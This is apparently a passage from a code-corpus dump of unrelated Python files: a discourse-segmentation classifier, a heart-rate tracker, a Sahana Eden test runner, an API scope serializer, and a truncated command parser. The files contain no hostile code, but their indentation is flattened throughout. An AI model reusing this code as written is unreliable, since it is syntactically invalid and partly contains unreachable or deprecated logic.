clf.fit(data_x,data_y,cat_features=list(range(len(cat_labels))))
else:
clf.fit(data_x,data_y)
self.clf = clf
feature_names = cat_labels + num_labels
sys.stderr.write("o Using " + str(len(feature_names)) + " features\n")
zipped = zip(feature_names, clf.feature_importances_)
sorted_zip = sorted(zipped, key=lambda x: x[1], reverse=True)
sys.stderr.write("o Feature Gini importances:\n\n")
for name, importance in sorted_zip:
sys.stderr.write(name + "=" + str(importance) + "\n")
if self.clf.__class__.__name__ not in ["GradientBoostingClassifier","CatBoostClassifier","XGBClassifier"]:
sys.stderr.write("\no OOB score: " + str(clf.oob_score_)+"\n\n")
if tune_mode=="permutation":
# Filter features based on permutation importance score threshold
imp = permutation_importances(clf,val_x,val_y)
for var, score in imp.items():
if score < 0 and var != "word":
sys.stderr.write("o Dropping feature " + var + " due to low permutation importance of " + str(score) + "\n")
if var in cat_labels:
cat_labels.remove(var)
elif var in num_labels:
num_labels.remove(var)
sys.stderr.write("o Measuring correlation of numerical variables\n")
cor_mat = report_correlations(val_x[num_labels])
for (var1, var2) in cor_mat:
if var1 in num_labels and var2 in num_labels:
drop_var = var2 if imp[var1] > imp[var2] else var1
if drop_var == "word":
continue
corr_level = cor_mat[(var1, var2)]
sys.stderr.write("o Removed feature " + drop_var + " due to correlation " + str(corr_level) + " of " + var1 + ":" + var2 + "\n")
num_labels.remove(drop_var)
return cat_labels, num_labels
sys.stderr.write("\no Serializing model...\n")
joblib.dump((clf, num_labels, cat_labels, multicol_dict, top_n_words, firsts, lasts), self.model, compress=3)
def predict_cached(self,train=None):
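        """Load the serialized out-of-fold multitraining predictions for this corpus
        from the multitrain directory and return them as (label, probability) tuples."""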
pairs = io.open(script_dir + os.sep + "multitrain" + os.sep + self.name + self.auto + '_' + self.corpus).read().split("\n")
preds = [(int(pr.split()[0]), float(pr.split()[1])) for pr in pairs if "\t" in pr]
return preds
def predict(self, infile, eval_gold=False, as_text=True):
"""
Predict sentence splits using an existing model
:param infile: File in DISRPT shared task *.tok or *.conll format (sentence breaks will be ignored in .conll)
:param eval_gold: Whether to score the prediction; only applicable if using a gold .conll file as input
:param genre_pat: A regex pattern identifying the document genre from document name comments
:param as_text: Boolean, whether the input is a string, rather than a file name to read
:return: tokenwise binary prediction vector if eval_gold is False, otherwise prints evaluation metrics and diff to gold
"""
if self.model is None: # Try default model location
model_path = ".." + os.sep + ".." + os.sep + "models" + os.sep + "subtreeseg.pkl"
else:
model_path = self.model
clf, num_labels, cat_labels, multicol_dict, top_n_words, firsts, lasts = joblib.load(model_path)
feats, _, toks, _, _ = read_conll(infile,genre_pat=self.genre_pat,mode="seg",as_text=as_text,char_bytes=self.lang=="zho")
tokens_by_abs_id = self.traverse_trees(feats)
feats, headers = self.n_gram(feats,tokens_by_abs_id,dummies=False)
temp = []
headers_with_oov = ["first","last","deprel","closest_left","closest_right","farthest_left","farthest_right",
"pos","cpos","morph","s_type","depchunk"]
for pref in ["mn2","mn1","par","par_par","pl1","pl2"]:
temp += [pref + "_" + h for h in headers_with_oov]
headers_with_oov += temp
genre_warning = False
for i, header in enumerate(headers):
if header in headers_with_oov and header in cat_labels:
for item in feats:
if item[i] not in multicol_dict["encoder_dict"][header].classes_:
item[i] = "_"
elif header == "genre" and "genre" in cat_labels:
for item in feats:
if item[i] not in multicol_dict["encoder_dict"]["genre"].classes_: # New genre not in training data
if not genre_warning:
sys.stderr.write("! WARN: Genre not in training data: " + item[i] + "; suppressing further warnings\n")
genre_warning = True
item[i] = "_"
elif header.endswith("word") and header in cat_labels:
for item in feats:
# Replace rare words and words never seen before in this position with POS
if item[i] not in top_n_words or item[i] not in multicol_dict["encoder_dict"][header].classes_:
pos_col = headers.index(header.replace("word","pos"))
if item[pos_col] in multicol_dict["encoder_dict"][header].classes_:
item[i] = item[pos_col]
else:
item[i] = "_"
data = feats
data = pd.DataFrame(data, columns=headers)
data_encoded = self.multicol_transform(data,columns=multicol_dict["columns"],all_encoders_=multicol_dict["all_encoders_"])
data_x = data_encoded[cat_labels+num_labels].values
probas = clf.predict_proba(data_x)
probas = [p[1] for p in probas]
preds = [int(p>0.5) for p in probas]
for i, p in enumerate(preds):
if data["tok_id"].values[i] == 1: # Ensure tok_id 1 is always a segment start
preds[i] = 1
if eval_gold:
gold = np.where(data_encoded['label'] == "_", 0, 1)
conf_mat = confusion_matrix(gold, preds)
sys.stderr.write(str(conf_mat) + "\n")
true_positive = conf_mat[1][1]
false_positive = conf_mat[0][1]
false_negative = conf_mat[1][0]
prec = true_positive / (true_positive + false_positive)
rec = true_positive / (true_positive + false_negative)
f1 = 2*prec*rec/(prec+rec)
sys.stderr.write("P: " + str(prec) + "\n")
sys.stderr.write("R: " + str(rec) + "\n")
sys.stderr.write("F1: " + str(f1) + "\n")
with io.open("diff.tab",'w',encoding="utf8") as f:
for i in range(len(gold)):
f.write("\t".join([toks[i],str(gold[i]),str(preds[i])])+"\n")
return conf_mat, prec, rec, f1
else:
return zip(preds,probas)
def optimize(self, train, rare_thresh=200, size=5000, tune_mode="paramwise",as_text=False, cached_params=False):
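        """Two-stage optimization: first select informative features on a random sample
        ("importances" mode, dropping correlated or implied variables), then tune
        hyperparameters via grid search/hyperopt or reuse cached best parameters.
        Returns the chosen classifier, the selected feature names and the best parameters."""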
# Estimate useful features on a random sample of |size| instances
selected_cat, selected_num = self.train(train,rare_thresh=rare_thresh,tune_mode="importances",size=size,as_text=as_text)
selected_feats = selected_cat + selected_num
with io.open(script_dir + os.sep + "SubtreeSegmenter_best_params"+self.auto+".tab",'a',encoding="utf8") as bp:
bp.write(self.corpus + "\t"+self.clf.__class__.__name__+"\tfeatures\t" + ",".join(selected_feats)+"\n")
sys.stderr.write("o Chose "+str(len(selected_feats))+" features: " + ",".join(selected_feats)+"\n")
if tune_mode != "features":
sys.stderr.write("o Tuning hyperparameters\n\n")
# Optimize hyperparameters via grid search
if cached_params:
best_clf, best_params, _ = get_best_params(self.corpus, self.name)
sys.stderr.write("\no Using cached best hyperparameters\n")
elif tune_mode!="features":
best_clf, best_params = self.train(train,rare_thresh=rare_thresh,tune_mode=tune_mode,size=200000,as_text=as_text, chosen_feats=selected_feats)
sys.stderr.write("\no Found best hyperparameters\n")
else:
best_clf = DEFAULTCLF
best_params = DEFAULTPARAMS
sys.stderr.write("\no Using default hyperparameters\n")
for key, val in best_params.items():
sys.stderr.write(key + "\t" + str(val) + "\n")
sys.stderr.write(best_clf.__class__.__name__ + "\n")
sys.stderr.write("\n")
return best_clf, selected_feats, best_params
@staticmethod
def traverse_trees(tokens):
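        """Index tokens by absolute sentence_word id and enrich them in place with
        tree-derived features: descendant lists, graph rank (depth), closest/farthest
        left and right child deprels, left/right span sizes and same-parent flags for
        neighbouring tokens. Returns the id-to-token dictionary."""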
tokens_by_abs_id = {}
def get_descendants(parent_id, children_dict, seen_tokens):
# Helper function to recursively collect children of children
my_descendants = []
my_descendants += children_dict[parent_id]
for child in children_dict[parent_id]:
if child["abs_id"] in seen_tokens:
sys.stderr.write("\nCycle detected in syntax tree in sentence " + str(child["s_id"])+" token: "+child["word"]+"\n")
sys.exit("Exiting due to invalid input\n")
else:
seen_tokens.add(child["abs_id"])
for child in children_dict[parent_id]:
child_id = child["abs_id"]
if child_id in children_dict:
my_descendants += get_descendants(child_id, children_dict, seen_tokens)
return my_descendants
def get_rank(tok, token_dict, rank=0):
# Helper function to determine tokens' graph depth
if tok["abs_parent"].endswith("_0"):
return rank
else:
rank+=1
return get_rank(token_dict[tok["abs_parent"]],token_dict,rank=rank)
# Make unique ids
for tok in tokens:
tok["abs_id"] = str(tok["s_id"]) + "_" + str(tok["wid"])
tok["abs_parent"] = str(tok["s_id"]) + "_" + str(tok["head"])
tok["descendants"] = [] # Initialize descendant list
tokens_by_abs_id[str(tok["s_id"]) + "_" + str(tok["wid"])] = tok
# Add dist2end feature (=reverse id)
for tok in tokens:
tok["dist2end"] = tok["s_len"]-tok["wid"]
# Make children dict
children = defaultdict(list)
for tok in tokens:
if not tok["abs_parent"].endswith("_0"):
children[tok["abs_parent"]].append(tok)
# Recursively get descendants
for parent_id in children:
seen_tokens = set()
parent = tokens_by_abs_id[parent_id]
parent["descendants"] = get_descendants(parent_id, children, seen_tokens)
# Compute graph rank for each token
for tok in tokens:
tok["rank"] = get_rank(tok, tokens_by_abs_id, 0)
# Use descendant dictionary to find closest/farthest left/right children's network
for tok in tokens:
tok["farthest_left"] = tok
tok["farthest_right"] = tok
tok["closest_right"] = tok
tok["closest_left"] = tok
tok["right_span"] = 0
tok["left_span"] = 0
d_list = sorted(tok["descendants"],key=lambda x: x["tok_id"])
for d in d_list:
d_id = d["tok_id"]
t_id = tok["tok_id"]
if d_id < t_id: # Left child
if d_id < int(tok["farthest_left"]["tok_id"]):
tok["farthest_left"] = d
# tok["left_span"] = self.bin_numbers(tok["left_span"] ,bin_splits=[-6,-3,-1,0,1,2,4,7])
tok["left_span"] = int(tok["tok_id"]) - int(d["tok_id"])
if (d_id > int(tok["closest_left"]["tok_id"]) and d_id < tok["tok_id"]) or (d_id < tok["tok_id"] and tok["closest_left"] == tok):
tok["closest_left"] = d
else: # Right child
if d_id > int(tok["farthest_right"]["tok_id"]):
tok["farthest_right"] = d
tok["right_span"] = int(d["tok_id"]) - int(tok["tok_id"])
if (d_id < tok["closest_right"]["tok_id"] and d_id > tok["tok_id"]) or (d_id > tok["tok_id"] and tok["closest_right"] == tok):
tok["closest_right"] = d
# Represent child network as deprels
for prop in ["closest_right","closest_left","farthest_right","farthest_left"]:
if tok[prop] == tok:
tok[prop] = "_"
else:
tok[prop] = tok[prop]["deprel"]
# Add same parent features (whether a token has the same parent as its right/left neighbors)
tokens[0]["samepar_left"] = 0
tokens[-1]["samepar_right"] = 0
for i in range(1,len(tokens)-1):
prev, tok, next = tokens[i-1], tokens[i], tokens[i+1]
if prev["abs_parent"] == tok["abs_parent"]:
prev["samepar_right"] = 1
tok["samepar_left"] = 1
else:
prev["samepar_right"] = 0
tok["samepar_left"] = 0
if next["abs_parent"] == tok["abs_parent"]:
tok["samepar_right"] = 1
next["samepar_left"] = 1
else:
tok["samepar_right"] = 0
next["samepar_left"] = 0
return tokens_by_abs_id
@staticmethod
def bin_numbers(number,bin_splits=None):
if bin_splits is None:
return 1 # Single bin
else:
for i in bin_splits:
if number >= i:
return i
return bin_splits[0] # If number not greater than any split, it belongs in minimum bin
@staticmethod
def n_gram(data, tokens_by_abs_id, dummies=True):
"""
Turns unigram list of feature dicts into list of five-skipgram+parent features by adding features of adjacent tokens
:param data: input tokens as a list of dictionaries, each filled with token property key-values
:param tokens_by_abs_id: dictionary of absolute sent+word IDs to the corresponding token property dictionary
:param dummies: Boolean, whether to wrap data with dummy -2, -1 ... +1 +2 tokens for training (should be False when predicting)
:return: n_grammified token list without feature names, and list of header names
"""
n_grammed = []
# Remove unneeded features
del_props = ["descendants","lemma","docname","head"]
for tok in data:
for prop in del_props:
tok.pop(prop)
base_headers = sorted(data[0].keys())
headers = copy.deepcopy(base_headers)
# Create fake root token to represent parent of root tokens
root_type = copy.deepcopy(data[0])
root_type.update({"word":"_","deprel":"_","first":"_","last":"_","genre":"_","closest_left":"_",
"closest_right":"_","farthest_left":"_","farthest_right":"_","pos":"_","cpos":"_","morph":"_"})
# Also use this token to introduce "_" as possible feature value for OOV cases
oov_type = copy.deepcopy(root_type)
oov_type["abs_id"] = "OOV"
oov_type["abs_parent"] = "OOV"
tokens_by_abs_id["OOV"] = oov_type
for pref in ["mn2","mn1","par","par_par","pl1","pl2"]:
headers += [pref + "_" + h for h in base_headers]
# During training, pseudo-wrap extra tokens to enable 5 skip grams
wrapped = []
wrapped.append(copy.deepcopy(data[-2]))
wrapped.append(copy.deepcopy(data[-1]))
if dummies:
wrapped.append(oov_type)
wrapped += data
if dummies:
wrapped.append(oov_type)
wrapped.append(copy.deepcopy(data[0]))
wrapped.append(copy.deepcopy(data[1]))
data = wrapped
for i in range(2,len(data)-2):
tok = data[i]
prev_prev = data[i-2]
prev = data[i-1]
next = data[i+1]
next_next = data[i+2]
if tok["abs_parent"] in tokens_by_abs_id:
par = tokens_by_abs_id[tok["abs_parent"]]
else:
par = root_type
if par["abs_parent"] in tokens_by_abs_id:
par_par = tokens_by_abs_id[par["abs_parent"]]
else:
par_par = root_type
prev_prev_props = [prev_prev[k] for k in sorted(prev_prev.keys())]
prev_props = [prev[k] for k in sorted(prev.keys())]
tok_props = [tok[k] for k in sorted(tok.keys())]
par_props = [par[k] for k in sorted(par.keys())]
par_par_props = [par_par[k] for k in sorted(par_par.keys())]
next_props = [next[k] for k in sorted(next.keys())]
next_next_props = [next_next[k] for k in sorted(next_next.keys())]
n_grammed.append(tok_props + prev_prev_props + prev_props + par_props + par_par_props + next_props + next_next_props)
return n_grammed, headers
@staticmethod
def multicol_fit_transform(dframe, columns):
"""
Transforms a pandas dataframe's categorical columns into pseudo-ordinal numerical columns and saves the mapping
:param dframe: pandas dataframe
:param columns: list of column names with categorical values to be pseudo-ordinalized
:return: the transformed dataframe and the saved mappings as a dictionary of encoders and labels
"""
if isinstance(columns, list):
columns = np.array(columns)
else:
columns = columns
encoder_dict = {}
# columns are provided, iterate through and get `classes_` ndarray to hold LabelEncoder().classes_
# for each column; should match the shape of specified `columns`
all_classes_ = np.ndarray(shape=columns.shape, dtype=object)
all_encoders_ = np.ndarray(shape=columns.shape, dtype=object)
all_labels_ = np.ndarray(shape=columns.shape, dtype=object)
for idx, column in enumerate(columns):
# instantiate LabelEncoder
le = LabelEncoder()
# fit and transform labels in the column
dframe.loc[:, column] = le.fit_transform(dframe.loc[:, column].values)
encoder_dict[column] = le
# append the `classes_` to our ndarray container
all_classes_[idx] = (column, np.array(le.classes_.tolist(), dtype=object))
all_encoders_[idx] = le
all_labels_[idx] = le
multicol_dict = {"encoder_dict":encoder_dict, "all_classes_":all_classes_,"all_encoders_":all_encoders_,"columns": columns}
return dframe, multicol_dict
@staticmethod
def multicol_transform(dframe, columns, all_encoders_):
"""
Transforms a pandas dataframe's categorical columns into pseudo-ordinal numerical columns based on existing mapping
:param dframe: a pandas dataframe
:param columns: list of column names to be transformed
:param all_encoders_: same length list of sklearn encoders, each mapping categorical feature values to numbers
:return: transformed numerical dataframe
"""
for idx, column in enumerate(columns):
dframe.loc[:, column] = all_encoders_[idx].transform(dframe.loc[:, column].values)
return dframe
if __name__ == "__main__":
p = ArgumentParser()
p.add_argument("-c","--corpus",default="spa.rst.sctb",help="corpus to use or 'all'")
p.add_argument("-d","--data_dir",default=os.path.normpath("../../../data"),help="Path to shared task data folder")
p.add_argument("-s","--sample_size",type=int,default=5000,help="Sample size to use for feature selection")
p.add_argument("-t","--tune_mode",default=None,choices=[None,"paramwise","full","hyperopt","features","permutation"])
p.add_argument("-r","--rare_thresh",type=int,default=200,help="Threshold rank for replacing words with POS tags")
p.add_argument("-m","--multitrain",action="store_true",help="Perform multitraining and save predictions for ensemble training")
p.add_argument("-b","--best_params",action="store_true",help="Load best parameters from file")
p.add_argument("--mode",action="store",default="test",choices=["train","train-test","optimize-train-test","test"])
p.add_argument("--eval_test",action="store_true",help="Evaluate on test, not dev")
p.add_argument("--auto",action="store_true",help="Evaluate on automatic parse")
opts = p.parse_args()
data_dir = opts.data_dir
rare_thresh = opts.rare_thresh
tune_mode = opts.tune_mode
if opts.auto:
data_dir = data_dir + "_parsed"
sys.stderr.write("o Evaluating on automatically parsed data\n")
corpora = os.listdir(data_dir)
if opts.corpus == "all":
corpora = [c for c in corpora if os.path.isdir(os.path.join(data_dir, c))]
else:
corpora = [c for c in corpora if os.path.isdir(os.path.join(data_dir, c)) and c == opts.corpus]
for corpus in corpora:
if "pdtb" in corpus:
continue
sys.stderr.write("o Corpus: " + corpus + "\n")
train = os.path.join(data_dir,corpus, corpus + "_train.conll")
dev = os.path.join(data_dir, corpus, corpus + "_dev.conll")
test = os.path.join(data_dir, corpus, corpus + "_test.conll")
if "." in corpus:
lang = corpus.split(".")[0]
else:
lang = "eng"
auto = "" if not opts.auto else "_auto"
seg = SubtreeSegmenter(lang=lang,model=corpus,auto=auto)
seg.corpus_dir = data_dir + os.sep + corpus
# Special genre patterns and feature settings
if "gum" in corpus:
seg.genre_pat = "GUM_(.+)_.*"
best_params = None
if "optimize" in opts.mode:
best_clf, vars, best_params = seg.optimize(train,size=opts.sample_size,tune_mode=tune_mode,rare_thresh=rare_thresh,as_text=False, cached_params=opts.best_params)
# Now train on whole training set with those variables
if "best_score" in best_params:
best_params.pop("best_score")
sys.stderr.write("\no Training best configuration\n")
seg.train(train,chosen_feats=vars,rare_thresh=rare_thresh,clf_params=best_params,as_text=False,chosen_clf=best_clf)
elif "train" in opts.mode:
feats = None
params = None
best_clf = None
if opts.best_params:
best_clf, params, feats = get_best_params(corpus, "SubtreeSegmenter" + auto)
if len(feats) == 0:
feats = None
seg.train(train,rare_thresh=rare_thresh,as_text=False,multitrain=opts.multitrain,chosen_feats=feats,clf_params=params,chosen_clf=best_clf)
if "test" in opts.mode:
if opts.multitrain:
# Get prediction performance on out-of-fold
preds = seg.predict_cached()
else:
# Get prediction performance on dev
if opts.eval_test:
conf_mat, prec, rec, f1 = seg.predict(test,eval_gold=True,as_text=False)
else:
conf_mat, prec, rec, f1 = seg.predict(dev,eval_gold=True,as_text=False)
if best_params is not None and "optimize" in opts.mode: # For optimization check if this is a new best score
prev_best_score = get_best_score(corpus,"SubtreeSegmenter" + auto)
if f1 > prev_best_score:
sys.stderr.write("o New best F1: " + str(f1) + "\n")
print(seg.clf.__dict__)
with io.open(script_dir + os.sep + "params" + os.sep + "SubtreeSegmenter"+auto+"_best_params.tab",'a',encoding="utf8") as bp:
for k, v in best_params.items():
bp.write("\t".join([corpus, best_clf.__class__.__name__, k, str(v)])+"\n")
bp.write("\t".join([corpus, best_clf.__class__.__name__, "features", ",".join(vars)])+"\n")
bp.write("\t".join([corpus, best_clf.__class__.__name__, "best_score", str(f1)])+"\n\n")
|
py | 1a3301d31666fa1c538c086d72a8585c8348e754 | #!/usr/bin/env python
from mapHrEstimator import *
#
# Global function
#
class Tracker:
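    """
    Alpha-beta style tracker that smooths a stream of peak estimates into a single
    frequency state bounded to [boundLo, boundHi], keeping histories of peaks,
    filtered frequencies, timestamps and dynamic range for later plotting.
    """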
def __init__(self, start, alpha=.01, beta=0, deltaFreqState = np.float(0), time=-1000,
maxChange = .5, boundHi=205, boundLo=40, maxDeltaT=3000):
self.freqState = np.float(start)
self.deltaFreqState = deltaFreqState
self.time = time
self.boundHi = boundHi
self.boundLo = boundLo
self.peakHist = []
self.freq = []
self.deltaFreq = []
self.timeHist = []
        self.drHist = []
        self.residual = []  # history of (clipped) filter residuals, kept for plotting/inspection
self.alpha = alpha
self.beta = beta
self.maxChange = maxChange
self.maxDeltaT = maxDeltaT
    def update(self, time, peak, dynamicRange=None, maxRes=20, invalidHRHold=False):
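        """
        Advance the tracker to `time` (milliseconds) with a new peak estimate.
        The residual between the peak and the current frequency state is clipped to
        maxRes and blended in with the alpha (and nominally beta) gains; the state is
        kept within [boundLo, boundHi]. A peak of -1 marks an invalid measurement and
        invalidHRHold controls whether the previous estimate is held in that case.
        """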
deltaT = (time - self.time)
if deltaT > self.maxDeltaT:
deltaT = self.maxDeltaT
#Convert into seconds
deltaT = deltaT/1000
#todo - why do we need this???
if deltaT <= 0.0:
print("Negative DeltaT")
return 0
self.time = time
self.timeHist.append(self.time)
self.drHist.append(dynamicRange)
if peak == -1:
self.setInvalidHR(invalidHRHold=invalidHRHold)
return 0
if peak is None:
print("No Peak Passed to tracker")
self.peakHist.append(0)
else:
self.peakHist.append(peak)
if peak is not None:
if peak < self.boundLo or peak > self.boundHi:
peak = self.freqState
self.deltaFreqState = 0
else:
self.deltaFreqState = 0
if self.deltaFreqState > .5:
self.deltaFreqState = .5
if self.deltaFreqState < -.5:
self.deltaFreqState = -.5
# Kludge: Setting deltaFreqState to zero thus eliminated the beta part of the filter
self.deltaFreqState = 0
self.freqState += deltaT*self.deltaFreqState
if peak is not None:
residual = peak - self.freqState
alpha = self.alpha
beta = self.beta
if np.abs(residual) > maxRes:
residual = np.sign(residual)*maxRes
            self.residual.append(residual)  # keep residual history so it can be plotted later
            #update the state
self.freqState += alpha*residual
self.deltaFreqState += (beta/deltaT)*residual
if self.freqState < self.boundLo:
self.freqState = self.boundLo
self.deltaFreqState = 0
elif self.freqState > self.boundHi:
self.freqState = self.boundHi
self.deltaFreqState = 0
self.freq.append(self.freqState)
self.deltaFreq.append(self.deltaFreqState)
return 0
def setInvalidHR(self, invalidHRHold=False):
self.deltaFreqState = 0
self.peakHist.append(0)
if invalidHRHold:
self.freq.append(self.freqState) # hold prevHR during HR is invalid
else:
self.freq.append(-1) # do not hold prevHR, output -1
self.deltaFreq.append(self.deltaFreqState)
return 0
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('fname', help='data log file', default=None)
parser.add_argument('--truthFile', help='heart strap data', default=None)
parser.add_argument('--alphaFile', help='heart strap data from mio alpha', default=None)
parser.add_argument('--noPlots',help='show the plots or not',default=False,action='store_true')
parser.add_argument('--out', help='output filename', default='foo.csv')
args = parser.parse_args()
optTracks = []
accTracks = []
#header_def = [ ('time',float),('opt0',float),('opt1',float),('opt2',float),('acc0',float),('acc1',float),('acc2',float) ]
d = np.genfromtxt(args.fname,delimiter=',')
peaks = d[:,1:4]
accPeaks = d[:,4:7]
time = d[:,0]
startVals = [70]
for ind in np.arange(0,len(startVals)):
optTracks.append(Tracker(startVals[ind],maxChange=5))
startVals = [100]
for ind in np.arange(0,len(startVals)):
accTracks.append(Tracker(startVals[ind],alpha=.1,beta=.25))
for ind in np.arange(0,peaks.shape[0]):
for peakInd in np.arange(0,peaks.shape[1]):
for accInd in np.arange(0,accPeaks.shape[1]):
if (np.abs(peaks[ind,0] - peaks[ind,1]) < 20):
if np.abs(peaks[ind,peakInd]-accPeaks[ind,accInd]) < 5.0:
peaks[ind,peakInd] = np.min(peaks[ind,:])
#update the accelerometer tracks
#for each track find the closest peak
for track in np.arange(0,len(accTracks)):
accTracks[track].update(time[ind],accPeaks[ind,track])
'''
#for each track find the closest peak
for track in accTracks:
res = np.zeros((accPeaks.shape[1],))
for peakInd in np.arange(0,accPeaks.shape[1]):
res[peakInd] = np.abs(accPeaks[ind,peakInd] - track.freqState)
closest = np.argmin(res)
track.update(time[ind],accPeaks[ind,closest])
'''
#for each track find the closest peak
for track in optTracks:
res = np.zeros((peaks.shape[1],))
weight=np.array([1.0,1.0,1.0])
for peakInd in np.arange(0,peaks.shape[1]):
if peaks[ind,peakInd] > 90:
res[peakInd] = weight[peakInd]*np.abs(peaks[ind,peakInd] - track.freqState)
closest = np.argmin(res)
track.update(time[ind],peaks[ind,closest])
pl.figure()
for ind in np.arange(0,peaks.shape[1]):
pl.plot(time[:],peaks[:,ind],'+')
pl.grid(True)
#pl.figure()
#todo - interpolate truth heart rate onto measured heart rate
if args.truthFile is not None:
hrTruth = np.genfromtxt(args.truthFile,skiprows=3,delimiter=',');
tTrue=hrTruth[:,0]-hrTruth[1,0]
tTrue /= 1000
pl.plot(tTrue,hrTruth[:,1],'g')
for track in optTracks:
pl.plot(track.timeHist,track.freq,'--')
pl.grid(True)
pl.figure()
for ind in np.arange(0,accPeaks.shape[1]):
pl.plot(time[:],accPeaks[:,ind],'+')
for track in accTracks:
pl.plot(track.timeHist,track.freq,'--')
pl.grid(True)
pl.figure()
if args.truthFile is not None:
pl.plot(tTrue,hrTruth[:,1],'g')
for track in optTracks:
pl.plot(track.timeHist,track.freq,'--')
pl.grid(True)
pl.figure()
pl.plot(optTracks[0].residual)
pl.show()
|
py | 1a3302e989a4d8f333e441e3286f5540276cb707 | import unittest
import sys
import StringIO
import HTMLTestRunner
import time
import traceback
class TestConfig(object):
""" Functions which are useful in both interactive & non-interactive mode """
def __init__(self):
self.suite = unittest.TestSuite()
def test_main(self, testList, browser):
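        """Restrict each module's test class to the selected tests, run the combined
        suite through HTMLTestRunner and write the UTF-8 report to
        ../results/regressionTest-<browser>-<timestamp>.html."""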
for testModule in testList: # dotted notation module.class
self.overrideClassSortList(testModule["class"], testModule["tests"])
# self.suite.addTests(unittest.defaultTestLoader.loadTestsFromName(testName))
# Invoke TestRunner
buf = StringIO.StringIO()
runner = HTMLTestRunner.HTMLTestRunner(
stream=buf,
title="<Sahana Eden Test>",
description="Suite of regressions tests for Sahana Eden."
)
runner.run(self.suite)
# check out the output
byte_output = buf.getvalue()
# output the main test output for debugging & demo
# print byte_output
# HTMLTestRunner pumps UTF-8 output
output = byte_output.decode("utf-8")
self.fileName = "../results/regressionTest-%s-%s.html" % (browser.replace("*", ""), time.strftime("%Y%m%d-%H%M%S"))
file = open(self.fileName, "w")
file.write(output)
def overrideClassSortList(self, className, testList):
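        """Import the test class given in dotted notation, restrict its sort list to
        the selected test names and add the resulting ordered suite to self.suite."""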
testLoader = unittest.defaultTestLoader
        tempTests = unittest.TestSuite()
try:
# loadTestsFromName will also import the module
tempTests = testLoader.loadTestsFromName(className)
except:
print "Unable to run test %s, check the test exists." % className
traceback.print_exc()
parts = className.split(".")
if len(parts) == 2:
# Grab the loaded module and get a instance of the class
module = sys.modules[parts[0]]
obj = getattr(module, parts[1])
obj.setSortList(testList)
# Add the sorted tests to the suite of test cases to be run
suite = unittest.TestSuite(map(obj, obj._sortList))
self.suite.addTests(suite)
# a file with test details listed per line, with the format being:
# <display name>, <dotted notation of the test>
# any line not meeting this criteria will be ignored.
# <dotted notation of the test> is:
# module optionally followed by the class name optionally followed by the method
# OR: module[.class[.method]]
def getTestModuleDetails(self):
# Read in the testModules files this is a comma separated list
# Each row consists of two values, the name to be displayed in the UI
# and the name of the class that will be invoked.
source = open("../data/testModules.txt", "r")
modules = source.readlines()
source.close()
# moduleList is a data structure containing all the details required by the UI for a module
# The outer structure is a list of modules
# The value is a map that will have three values
# name:display name, class the ClassName and tests:map of testcases
# The map of tests consists of the testName and a bool to indicate if it should be run
# [0]{
# name:CreateLocations:
# class:locations.Locations,
# tests:{'name':"loadLocationTestData",'state':True,
# 'name':"test_locationEmpty",'state':False,
# 'name':"test_addL0Location",'state':False,
# 'name':"removeLocationTestData",'state':True
# }
# }
moduleList = []
for module in modules:
details = module.split(",")
if len(details) == 2:
moduleDetails = {}
moduleDetails["name"] = details[0].strip()
moduleDetails["class"] = details[1].strip()
moduleDetails["tests"] = self.readTestCasesForClass(moduleDetails["class"])
moduleList.append(moduleDetails)
return moduleList
def readTestCasesForClass(self, className):
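        """Read per-test enable/disable flags for a class from ../tests/<class>.txt;
        if the file is missing, fall back to extracting the test list from the class."""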
try:
source = open("../tests/%s.txt" % className, "r")
testcases = source.readlines()
source.close()
except:
# Need to generate the list from the class
print "File ../tests/%s.txt not found" % className
return self.extractTestCasesFromClassSource(className)
testList = []
for test in testcases:
details = test.split(",")
if len(details) == 2:
testDetails = {}
testDetails["name"] = details[0].strip()
if details[1].strip() == "True":
testDetails["state"] = True
else:
testDetails["state"] = False
testList.append(testDetails)
return testList
def extractTestCasesFromClassSource(self, className):
parts = className.split(".")
if len(parts) == 2:
# Grab the loaded module and get a instance of the class
try:
module = __import__( parts[0] )
except ImportError:
print "Failed to import module %s" % parts[0]
raise
module = sys.modules[parts[0]]
obj = getattr(module, parts[1])
testList = []
for test in obj._sortList:
tests = {}
tests["state"] = True
tests["name"] = test
testList.append(tests)
return testList
return []
def getTestCasesToRun(self, moduleList):
""" Take a moduleList & convert to the correct format """
i = 0
testModuleList = []
for module in moduleList:
testModule = {}
testDetail = []
for test in moduleList[i]["tests"]:
if test["state"] == True:
testDetail.append(test["name"])
testModule["class"] = moduleList[i]["class"]
testModule["tests"] = testDetail
testModuleList.append(testModule)
i += 1
return tuple(testModuleList)
|
py | 1a330357d9c079d268e1f3a124acf0db6a7e2bc2 | from rest_framework import serializers as ser
from website import settings
from urlparse import urljoin
from api.base.serializers import (
JSONAPISerializer,
LinksField,
)
class Scope(object):
def __init__(self, id, scope):
scope = scope or {}
self.id = id
self.description = scope.description
self.is_public = scope.is_public
def absolute_url(self):
return urljoin(settings.API_DOMAIN, '/v2/scopes/{}/'.format(self.id))
class ScopeSerializer(JSONAPISerializer):
filterable_fields = frozenset(['id'])
id = ser.CharField(read_only=True)
description = ser.CharField(read_only=True)
links = LinksField({'self': 'get_absolute_url'})
class Meta:
type_ = 'scopes'
def get_absolute_url(self, obj):
return obj.absolute_url()
|
py | 1a330375a387883eb347f805cfd8225531847d1f | from __future__ import annotations
import inspect
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple, Union
from .command import Command
from .converters import _CONVERTERS
if TYPE_CHECKING:
from .context import Context
__all__ = ("StringParser",)
class StringParser:
"""
A class representing a StringParser.
Attributes:
command_name (Optional[str]): The name of the command.
command (Optional[Command]): The [Command](./command.md) object.
arguments (List[str]): The arguments of the command.
content (str): The content of the command.
prefix (Union[Tuple[str], str]): The prefix of the command.
"""
def __init__(self, content: str, prefix: Union[str, Tuple[str, ...], List[str]]) -> None:
"""
Initialize a StringParser.
Parameters:
content (str): The content of the command.
prefix (Union[Tuple[str], str]): The prefix of the command.
"""
self.command_name: Optional[str] = None
self.command: Optional[Command] = None
self.arguments: List[str] = []
self.content = content
self.prefix = prefix
self.context: Context
def find_command(self) -> Optional[str]:
"""
Find the command.
Returns:
The command name.
"""
tokens = self.content.split(" ")
if prefix := self.parse_prefix():
if tokens[0].startswith(prefix):
self.command_name = tokens[0][len(prefix) :]
self.arguments = tokens[1:]
return self.command_name
return None
def parse_prefix(self) -> Optional[str]:
"""
Parse the prefix.
Returns:
The prefix.
"""
if isinstance(self.prefix, (tuple, list)):
find_prefix = [self.content.startswith(prefix) for prefix in self.prefix]
